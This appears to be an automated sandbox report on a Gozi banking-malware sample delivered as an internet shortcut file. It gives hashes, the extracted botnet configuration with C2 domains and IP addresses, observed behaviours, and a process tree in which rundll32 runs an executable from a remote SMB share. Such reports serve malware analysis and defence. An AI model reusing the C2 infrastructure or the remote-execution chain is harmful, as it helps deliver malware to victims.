Analysis
-
max time kernel
143s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
02-03-2023 10:59
Static task
static1
Behavioral task
behavioral1
Sample
azienda/azienda.url
Resource
win7-20230220-en
windows7-x64
1 signatures
150 seconds
General
-
Target
azienda/azienda.url
-
Size
192B
-
MD5
7c979eb1d63d67578329c6c9265046ef
-
SHA1
da995fa37d041a53c5f510370c314737ad1c23cc
-
SHA256
6537bdbd6b350022b95421209e5eb8cfd851a556904dd5b7b8a9189b21d40efb
-
SHA512
617b46a391ac42a93f68e4b4739a0ff9516d73e9761e6a4bc8194b6bb3d633350dcadc29d89bab179953c0908e526ea2a409fc6425c30fdd893a9b1d40c855a3
Malware Config
Extracted
Family
gozi
Botnet
7709
C2
checklist.skype.com
62.173.141.252
31.41.44.33
109.248.11.112
Attributes
-
base_path
/drew/
-
build
250255
-
exe_type
loader
-
extension
.jlk
-
server_id
50
rsa_pubkey.plain
aes.plain
Extracted
Family
gozi
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
rundll32.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
rundll32.exedescription pid process target process PID 4864 wrote to memory of 4524 4864 rundll32.exe server.exe PID 4864 wrote to memory of 4524 4864 rundll32.exe server.exe PID 4864 wrote to memory of 4524 4864 rundll32.exe server.exe
Processes
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\azienda\azienda.url1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4864 -
\??\UNC\46.8.19.235\Agenzia\server.exe"\\46.8.19.235\Agenzia\server.exe"2⤵PID:4524